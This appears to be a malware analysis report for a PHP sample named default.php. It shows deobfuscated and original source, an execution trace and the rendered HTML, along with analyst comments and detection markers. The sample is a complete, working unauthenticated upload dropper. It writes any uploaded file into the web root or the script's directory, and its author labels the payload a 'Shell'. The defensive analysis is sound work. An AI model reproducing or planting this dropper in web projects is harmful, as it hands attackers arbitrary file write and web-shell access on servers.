PHP Malware Analysis

default.php

md5: d7cd8b57f141e573fb83d1dc2e4fc59a


Screenshot


Attributes

Files

Input


Deobfuscated PHP code

<meta name="theme-color" content="black">
<style>
*{
background-color: #000000;
color: #fff;
text-align: center;
}

form input {
  background: black;
  border: 1px solid #54FE55;
  padding: .5rem;
  color: #54FE55;
  text-shadow: 0px 0px 10px #54FE55;
  box-shadow: 0px 0px 5px #54FE55;
}
form input:focus {
  outline: none;
}
form button {
  background: #1a4f1a;
  color: #54FE55;
  border: 0;
  text-shadow: 0px 0px 10px #54FE55;
  box-shadow: 0px 0px 10px #1a4f1a;
  cursor: pointer;
}
form button:focus {
  outline: none;
}</style>
<table width="100%" height="80%">
<td>
<?php 
// Analyst summary: unauthenticated file-upload dropper. Nothing in this script
// checks a password, session, token or source address, so any client that can
// request this URL can write a file of its choosing onto the server.
// It depends on two conditions a defender controls: the web-server account
// being able to write to the document root (or to this script's directory),
// and the written file then being served from there.
//
// Fixed marker banner. NOTE(review): presumably an actor/tool tag; together
// with the form field name 'idx_file' it is usable as a content signature.
echo "<small><<em>/0399obot</em>></small>";
// Upload form: multipart POST with file field 'idx_file' and submit field
// 'upload'. There is no action attribute, so the form posts back to this script.
echo "<form method='post' enctype='multipart/form-data'>\n\t  <input type='file' name='idx_file'>\n\t  <input type='submit' name='upload' value='upload'>\n\t  </form>";
// Preferred destination is the document root, i.e. a directory served over HTTP.
$root = $_SERVER['DOCUMENT_ROOT'];
// Client-supplied filename, used as-is: no extension or content-type allow-list.
// It is read before the isset() guard below, so on a plain GET it is NULL; the
// execution trace on this page records $files = NULL and $dest = '/var/www/html/'.
$files = $_FILES['idx_file']['name'];
$dest = $root . '/' . $files;
// Everything below runs only when the 'upload' submit field is present in the POST.
if (isset($_POST['upload'])) {
    if (is_writable($root)) {
        // copy() is used instead of move_uploaded_file(), so the "is this really
        // an uploaded temp file" check is skipped. '@' suppresses the warning a
        // failed copy would raise, so a failure shows only the echo below.
        if (@copy($_FILES['idx_file']['tmp_name'], $dest)) {
            // On success a clickable URL to the written file is printed. The host
            // part comes from the request's Host header and the filename is echoed
            // without HTML escaping. $web already ends in '/', so the printed link
            // contains a double slash before the filename.
            $web = "http://" . $_SERVER['HTTP_HOST'] . "/";
            echo "<a href='{$web}/{$files}' target='_blank'><b><u>{$web}/{$files}</u></b></a>";
        } else {
            // Indonesian: "failed to upload to root".
            echo "gagal upload root >:(";
        }
    } else {
        // Fallback when the document root is not writable: $files is a relative
        // path, so the copy is attempted relative to the current working
        // directory (the message below calls it "this folder").
        if (@copy($_FILES['idx_file']['tmp_name'], $files)) {
            // Indonesian: "Shell: <name> in this folder". The author's own label
            // for the uploaded file is "Shell", i.e. the expected payload is a web shell.
            echo "Shell: <b>{$files}</b> di folder ini";
        } else {
            // Indonesian: "upload failed".
            echo "gagal upload >:(";
        }
    }
}

Execution traces

data/traces/d7cd8b57f141e573fb83d1dc2e4fc59a_trace-1676247328.2972.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:15:54.195023]
1	0	1	0.000140	393528
1	3	0	0.000216	399392	{main}	1		/var/www/html/uploads/default.php	0	0
1		A						/var/www/html/uploads/default.php	39	$root = '/var/www/html'
1		A						/var/www/html/uploads/default.php	40	$files = NULL
1		A						/var/www/html/uploads/default.php	41	$dest = '/var/www/html/'
1	3	1	0.000286	399432
			0.000312	314376
TRACE END   [2023-02-12 22:15:54.195223]


Generated HTML code

<html><head><meta name="theme-color" content="black">
<style>
*{
background-color: #000000;
color: #fff;
text-align: center;
}

form input {
  background: black;
  border: 1px solid #54FE55;
  padding: .5rem;
  color: #54FE55;
  text-shadow: 0px 0px 10px #54FE55;
  box-shadow: 0px 0px 5px #54FE55;
}
form input:focus {
  outline: none;
}
form button {
  background: #1a4f1a;
  color: #54FE55;
  border: 0;
  text-shadow: 0px 0px 10px #54FE55;
  box-shadow: 0px 0px 10px #1a4f1a;
  cursor: pointer;
}
form button:focus {
  outline: none;
}</style>
</head><body><table width="100%" height="80%">
<tbody><tr><td>
<small>&lt;<em>/0399obot</em>&gt;</small><form method="post" enctype="multipart/form-data">
	  <input type="file" name="idx_file">
	  <input type="submit" name="upload" value="upload">
	  </form></td></tr></tbody></table></body></html>

Original PHP code

<meta name="theme-color" content="black">
<style>
*{
background-color: #000000;
color: #fff;
text-align: center;
}

form input {
  background: black;
  border: 1px solid #54FE55;
  padding: .5rem;
  color: #54FE55;
  text-shadow: 0px 0px 10px #54FE55;
  box-shadow: 0px 0px 5px #54FE55;
}
form input:focus {
  outline: none;
}
form button {
  background: #1a4f1a;
  color: #54FE55;
  border: 0;
  text-shadow: 0px 0px 10px #54FE55;
  box-shadow: 0px 0px 10px #1a4f1a;
  cursor: pointer;
}
form button:focus {
  outline: none;
}</style>
<table width="100%" height="80%">
<td>
<?php
// Original sample as submitted: an upload dropper with no authentication of any
// kind. Any client that can reach this script can place a file on the server.
// Review points for triage: the marker string in the banner, the form field
// name 'idx_file', and a multipart POST to this path followed by a new file
// appearing in the document root or next to this script.
echo "<small><<em>/0399obot</em>></small>";
// Self-posting multipart form (no action attribute) with fields 'idx_file' and 'upload'.
echo "<form method='post' enctype='multipart/form-data'>
	  <input type='file' name='idx_file'>
	  <input type='submit' name='upload' value='upload'>
	  </form>";
// Destination is built from the document root plus the filename the client
// sent; the name is not checked against any extension or type allow-list.
// These reads happen on every request, before the isset() guard.
$root = $_SERVER['DOCUMENT_ROOT'];
$files = $_FILES['idx_file']['name'];
$dest = $root.'/'.$files;
if(isset($_POST['upload'])) {
	// First choice: write into the document root if the web-server account can.
	if(is_writable($root)) {
		// copy() rather than move_uploaded_file(); '@' hides the warning on failure.
		if(@copy($_FILES['idx_file']['tmp_name'], $dest)) {
			// Prints a link to the written file. The host is taken from the Host
			// header and both values are echoed unescaped; $web ends in '/', so
			// the link carries a double slash.
			$web = "http://".$_SERVER['HTTP_HOST']."/";
			echo "<a href='$web/$files' target='_blank'><b><u>$web/$files</u></b></a>";
		} else {
			// Indonesian: "failed to upload to root".
			echo "gagal upload root >:(";
		}
	} else {
		// Second choice: relative path, i.e. the current working directory.
		if(@copy($_FILES['idx_file']['tmp_name'], $files)) {
			// Indonesian: "Shell: <name> in this folder"; the author labels the
			// uploaded file a "Shell".
			echo "Shell: <b>$files</b> di folder ini";
		} else {
			// Indonesian: "upload failed".
			echo "gagal upload >:(";
		}
	}
}
?>